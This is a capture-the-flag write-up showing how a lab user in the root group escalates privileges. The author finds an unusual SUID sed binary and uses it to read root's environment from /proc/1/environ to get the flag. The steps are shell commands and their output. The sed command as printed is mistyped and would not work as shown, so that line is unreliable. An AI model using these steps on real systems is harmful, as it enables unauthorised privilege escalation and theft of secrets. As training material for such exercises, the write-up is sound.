# Solution
We need to solve Tony Stank challenge first (this was sort of a hint)

tony is part of the root group

**$ id**

`uid=1001(tony) gid=0(root) groups=0(root)`

Let's search for interesting binaries (SUID / GUID set)

**$ find / -perm -u=s -user root -type f 2> /dev/null**

```
/bin/sed
/bin/mount
/bin/umount
/bin/su
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
```

All of them except **sed** are standard SUID binaries so we can execute sed because we are in the root group, but sed will execute with root privileges

From the description about, the keyword is environment (i.e. environment variable), therefore we can try reading root's environment variables

**$ ll /proc**

```
dr-xr-xr-x 1036 root root 0 Mar 30 04:26 ./
drwxr-xr-x 1 root root 4096 Mar 30 04:26 ../
dr-xr-xr-x 9 root root 0 Mar 30 04:26 1/
dr-xr-xr-x 9 root root 0 Mar 30 04:26 14/
dr-xr-xr-x 9 root steve 0 Mar 30 04:26 16/
dr-xr-xr-x 9 steve steve 0 Mar 30 04:26 18/
dr-xr-xr-x 9 tony root 0 Mar 30 04:51 181/
dr-xr-xr-x 9 steve steve 0 Mar 30 04:30 64/
```

We need to choose a pid that belongs to the group root so we can try and read **/proc/1/environ** with sed

**$ LFILE=/proc/1/environ; sed -e LFILE**

```
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binHOSTNAME=093f71aa8e91TERM=xtermflag=b00t2root{1_44aaaaaammmm_gr0000000ooooooOOO7777}HOME=/roottony@093f71aa8e91:~
```

This give us the flag: **b00t2root{1_44aaaaaammmm_gr0000000ooooooOOO7777}**